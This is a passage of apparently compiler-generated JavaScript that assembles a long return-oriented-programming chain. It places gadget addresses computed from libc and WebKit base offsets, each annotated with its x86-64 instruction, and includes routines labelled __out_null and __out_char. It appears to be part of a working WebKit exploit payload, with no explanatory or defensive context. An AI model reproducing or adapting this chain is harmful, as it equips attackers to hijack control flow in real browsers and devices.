rcx libc_base+764760, //pop rsi ropchain+163232, //L2388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2386: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2387: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2388: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2389: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+163304, //L2391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2391: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+163432, //L2393 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+163448, //L2394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+163416, //L2392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2392: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2393: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2394: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+163608, //L2398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+163576, //L2396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+163592, //L2397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2395: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2396: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2397: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2398: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl 
libc_base+764760, //pop rsi ropchain+163664, //L2400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2400: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+163792, //L2402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+163808, //L2403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+163776, //L2401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2401: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2402: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2403: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+163888, //L2404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+163904, //L2405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2404: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2405: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+164064, //L2409 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+164032, //L2407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+164048, //L2408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2406: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2407: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2408: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2409: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl 
libc_base+764760, //pop rsi ropchain+164120, //L2411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2411: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+164248, //L2413 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+164264, //L2414 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+164232, //L2412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2412: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2413: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2414: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+164360, //L2416 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+164344, //L2415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2415: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2416: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+164440, //L2417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2417: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2419: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+164560, //L2422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+164544, //L2420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop 
rcx ]); //L2420: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2422: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+164704, //L2425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+164672, //L2423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+164688, //L2424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2423: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2424: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2425: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+164776, //L2427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2427: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+164832, //L2428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2428: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+164912, //L2430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2430: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2432: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+165032, //L2435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+165016, //L2433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2433: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2435: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+165144, //L2436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+165176, //L2438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+165160, //L2437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2436: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2437: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2438: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+165264, //L2440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2440: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+165320, //L2441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2441: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+165392, //L2444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2444: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+165448, //L2445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2445: db([0, 
0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L2374: libc_base+764760, //pop rsi ropchain+165576, //L2448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+165560, //L2447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2447: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2448: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+165680, //L2449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+165696, //L2450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2449: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2450: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+165816, //L2451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+165800, //L2452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2452: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2451: db([0, 0]); // 0x0 //__out_null: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+165888, //L2454 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop 
r8 ]); //L2454: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+165984, //L2455 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+166016, //L2458 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2455: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2457: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L2458: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+166120, //L2461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+166104, //L2459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2459: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2461: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+166280, //L2465 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+166248, //L2463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+166264, //L2464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2462: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2463: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2464: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2465: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+166336, //L2467 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2467: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar 
edi, cl libc_base+764760, //pop rsi ropchain+166464, //L2469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+166480, //L2470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+166448, //L2468 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2468: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2469: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2470: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+166568, //L2471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+166584, //L2473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2471: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2473: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2474: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+166704, //L2477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+166688, //L2475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2475: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2477: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+166792, //L2478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+166808, //L2480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2478: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2480: db([0, 0]); // 
0x0 set_gadget(libc_base+764760,); //pop rsi //L2481: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+166928, //L2484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+166912, //L2482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2482: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2484: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+167016, //L2485 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+167032, //L2487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2485: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2487: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2488: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+167152, //L2491 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+167136, //L2489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2489: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2491: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+167296, //L2494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+167264, //L2492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+167280, //L2493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2492: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop 
rdi //L2493: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2494: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+167400, //L2495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+167416, //L2496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2495: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2496: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+167536, //L2497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+167520, //L2498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2498: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2497: db([0, 0]); // 0x0 //__out_char: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+167608, //L2500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2500: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+167704, //L2501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+167736, //L2504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2501: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2503: db([24, 
0]); // 0x18 set_gadget(webkit_base+568675,); //pop r8 //L2504: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+167840, //L2507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+167824, //L2505 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2505: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2507: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+167928, //L2508 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+167944, //L2510 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2508: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2510: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2511: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+168064, //L2514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+168048, //L2512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2512: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2514: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+168152, //L2515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+168168, //L2517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2515: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2517: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2518: db([40, 0]); 
// 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+168288, //L2521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+168272, //L2519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2519: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2521: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+168376, //L2522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+168392, //L2524 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2522: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2524: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2525: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+168512, //L2528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+168496, //L2526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2526: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2528: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+168672, //L2532 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+168640, //L2530 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+168656, //L2531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2529: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2530: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); 
//pop rdi //L2531: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2532: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+168728, //L2534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2534: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+168856, //L2536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+168872, //L2537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+168840, //L2535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2535: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2536: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2537: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+169032, //L2541 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+169000, //L2539 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+169016, //L2540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2538: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2539: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2540: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2541: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+169088, //L2543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2543: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+169216, 
//L2545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+169232, //L2546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+169200, //L2544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2544: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2545: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2546: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+169344, //L2548 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+169392, //L2551 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+169360, //L2549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2548: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2549: db([0, 